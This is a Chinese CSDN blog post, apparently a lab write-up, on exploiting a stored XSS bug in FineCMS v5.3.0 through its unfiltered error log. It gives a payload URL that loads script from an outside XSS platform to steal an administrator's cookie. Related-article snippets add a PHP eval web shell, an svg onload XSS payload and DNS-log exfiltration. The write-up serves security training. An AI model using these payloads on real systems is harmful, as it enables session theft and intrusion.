[zkaq靶场]XSS--存储型XSS

最新推荐文章于 2024-06-24 15:34:14 发布
最新推荐文章于 2024-06-24 15:34:14 发布
阅读量412 收藏 1
点赞数
分类专栏: zkaq靶场 文章标签: xss 存储型xss 跨站攻击 渗透测试 前端渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/116567654
版权

存储型XSS

靶场

靶场cms是Fine CMS,其版本为v5.3.0。

image-20210322201725598

image-20210322201809628

搜索该cms的漏洞。

参考:https://www.jianshu.com/p/200ea62486d9

image-20210322201938475

简单来说就是,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。

当错误日志写入文件的信息可控时,管理员在后台查看错误日志,就可以触发xss,从而窃取管理员的cookie信息。

漏洞点:

http://59.63.200.79:8082/index.php?c=show&m=test<sCRiPt sRC=//xs.sb/i4MU></sCrIpT>

访问上述地址时会发送错误,

image-20210322202612087

借助提前准备好的xss平台(xs.sb),在此处直接写入payload。

然后在xss平台查看项目(创建项目选择的是老版模块)

image-20210322202859705

成功获取到flag。

wwxxee
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 247
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
1. **存储XSS**:也称为持久XSS攻击者将恶意脚本存入服务器,当其他用户访问同一页面时,脚本将在用户的浏览器中执行。 2. **反射XSS**:非持久性,恶意脚本通过URL参数传递,用户点击链接或者提交表单后,...
XSS原理与解析
qq_45300786的博客
08-18 399
简单来说就是用cookie来登录。 证明存在XSS,一般打弹窗()或者直接窃取cookie(标签触发,不用点击) 第二种方法就是通过伪协议来证明XSS,http:// ftp://(伪协议触发,需要点击,有点类似于链接,需要点击才会跳转,所以才会触发) ...
Web渗透-XSS漏洞深入及xss-labs靶场实战
最新发布
Varin
06-24 1405
xss全称(cross site scripting)跨站脚本攻击,是最常见的web应用程序安全漏洞之一,位于owasptop102013年度第三名xss是指攻击者在网页中嵌入客户端脚本,通常是javascrip编写的危险代码,当用户使用浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的
存储XSS靶场
weixin_45540609的博客
04-24 361
我们看到靶场使用的是CMSv5.3.0,于是上网搜索它存在的漏洞 具体漏洞解析如这篇文章所示https://www.freebuf.com/column/165269.html 我们这里利用错误日记插入存储xss。当我们访问不存在的文件,页面时会产生错误。产生的错误会记录到错误日志里面,源码错误日记把记录的恶意语句没有过滤,当管理员在后台点击查看错误的日志时,存储XSS就会触发。 我们这里先用自建环境运行试验一下 在url里输入如下命令,显示了弹窗,说明存在xss漏洞 http://1
XSS注入(存储)---zkaq
weixin_38237216的博客
04-02 233
1.访问靶场 靶场cms是Fine CMS,版本是v5.3.0 2.寻找CMS已知漏洞,尝试攻击 网上搜索已知的Fine CMS的XSS漏洞利用信息 参考网站:https://www.freebuf.com/column/165269.html 漏洞根因:简而言之,该cms会将错误日志写入文件,但是写入过程中没有对错误信息过滤,直接写入了文件。然后该cms后台提供错误日志查看功能,错误日志信息直接读取上述文件,当管理员在后台查看错误日志时,程序从文件中读取日志信息。所以攻击点在于控制错误日志的信息。当
phpcms某处储存XSS(demo+本地演示)
weixin_30693683的博客
01-23 77
详细说明: demo+本地演示存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg onload=alert(/1/)>可以看到是正确的 然后点击提交可以看到说操作成功 然后来到我们的企业首页查看可以看到成功弹窗 再查看下...
dvwa靶场xss储存
W286734的博客
01-30 956
攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。产生层面:后端漏洞特征:持久性的、前端执行、储存在后端数据库。存储XSS数据交互过程:用户输入数据->后端执行php代码->存入数据库某张表->返回数据给php页面->回显前端。会发现无法对长度做了限制将maxlenth手动更改至能插入恶意代码的长度。本关对message参数进行了编码导致无法执行代码,还对name参数的。不需要访问指定链接,访问到存在恶意代码的网页会自动弹出。上传后刷新页面就会自动弹出。
WEB渗透学习-XSS-labs靶场
04-20
2. **存储XSS(Persistent XSS)**:这种类XSS更为危险,因为恶意脚本会被永久存储在服务器上,然后在其他用户访问相关页面时执行。在靶场中,你需要找到可以输入数据的地方,尝试插入恶意脚本,并查看是否能...
xss-labs-master源码
07-06
例如,"level9.php"可能涉及到DOM-based XSS,"level13.php"可能涉及存储XSS,每个级别都会引入不同的攻击场景和技术。 最后,"level6.php"到"level7.php"等文件代表了难度逐渐升级的过程,学习者需要掌握不同...
xss-lab靶场资源包
07-27
2. 存储XSS:又称持久性XSS,恶意脚本被存储在服务器端,如用户评论、论坛帖子等,当其他用户访问这些内容时,浏览器会自动执行嵌入的脚本。这种类XSS更危险,因为它可以影响大量用户。 3. DOMXSS:与前...
xss-labs靶场,直接放到www目录下直接用,超方便
09-24
2. **存储XSS**:恶意脚本被存储在服务器端,当其他用户查看含有该脚本的页面时,脚本被执行。 3. **DOMXSS**:不涉及服务器,而是利用浏览器的DOM(Document Object Model)特性,通过修改页面的DOM结构来注入...
[ pikachu ] 靶场通关之 XSS (三) --- 存储 XSS
qq_51577576的博客
01-14 2677
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、存储 XSS 二、过关: 1. 页面展示 2. 判断是否存在 XSS
xss存储漏洞靶场实现
rang的博客
10-23 792
什么是存储XSS攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存XSS的危害会更大。因为存储XSS的代码存在于网页的代码中,可以说是永久的。 存储 XSS 一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中。 在这里我还想说明的是,要真正了解xss漏洞的原理,已及相应的payload的构造,还要求具备相应的网站编辑语言的基础。否则就是一个只
MSSQL-反弹注入(zkaq靶场)
v2ish1yan的博客
04-29 3375
MSSQL就是sql server 他跟mysql进行注入的方式有所不同 这里写两种方法 1.联合查询注入 首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类一样,但是可以使用null来填充 首先来猜字段 order by 3时正确,order by 4时错误 所以字段数为3 然后进行猜数据类。先 ?id=1’ union all select NULL,NULL,NULL – qwe 回显正常 挨个测试数据类 ?id=1’ union all sele
DNS-log注入(zkaq靶场
v2ish1yan的博客
04-21 1298
DNS-log注入
[zkaq靶场]XSS--DOMXSS
wwxxee
05-09 477
DOMxss 知识点 DOM(document object model)文档对象模 一个网页是由dom树构建而成,而js可以修改页面元素,也就是可以修改dom树中的节点。客户端可以通过js动态修改页面内容从而进行xss攻击。 domxss常见函数: document.write():写入网页内容(可以接受native编码) innerHTML:修改节点内容 eval:将字符串当作代码执行 靶场 首页:是一个聊天室 查看页面代码发现此处使用了document.write()。 而页面的url跟文本
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 395
Access注入–偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入为access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
[zkaq靶场]代码执行--DouPHP-v1.5漏洞
wwxxee
05-10 1004
代码执行 相关函数与语句 eval():会将字符串当作代码来执行。 <?php @eval($_REQUEST["code"])?> 单双引号输出问题: assert():如果传入字符串会被当做PHP代码来执行 <?php @assert($_REQUEST["code"])?> 与eval的区别:eval可以执行多行,而assert只能执行一行。 当assert想要执行多行时,可以利用写文件的方式: file_put_contents("123.php","<?php
xss-labs靶场实战:安全防御与攻击技巧
XSS-Labs靶场是一个流行的在线环境,用于学习和实践跨站脚本攻击XSS)防御和利用技术。它通过一系列挑战帮助用户深入理解Web安全,特别是针对客户端输入验证不足的情况。以下是关于XSS-Labs靶场的一些关键知识点:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值